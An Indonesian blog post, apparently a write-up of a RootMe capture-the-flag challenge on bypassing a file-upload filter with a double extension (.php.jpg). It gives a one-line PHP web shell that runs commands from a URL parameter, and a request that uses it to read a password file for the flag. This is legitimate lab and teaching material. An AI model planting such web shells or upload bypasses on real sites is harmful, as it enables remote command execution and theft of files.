Thursday, December 27, 2018

[RootMe] File upload - double extensions

disoal ini saya harus mencari flag yang terdapat di file passwd, jadi untuk melakukan hal itu saya harus mengupload sebuah file php yang nanti digunakan untuk mengambil isi file passwd.

pertama saya membuat sebuah file php dengan format jpg kodenya seperti ini
<?php
passthru($_GET["cmd"]);
?>
setelah itu save dengan nama.php.jpg, lalu anda upload dan setelah berhasil diupload buka link file imagenya.

selanjutnya melakukan cat pada passwd, seperti ini:
domain/web-serveur/ch20/galerie/upload/l918s3nuuf8ki45ktqqhk30h01/crot.php.jpg?cmd=cat ../../../.passwd
maka flag akan muncul.

NB: kenapa format php bisa diupload? itu terjadi karena kurang security dan filter saat proses upload.
 
 
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)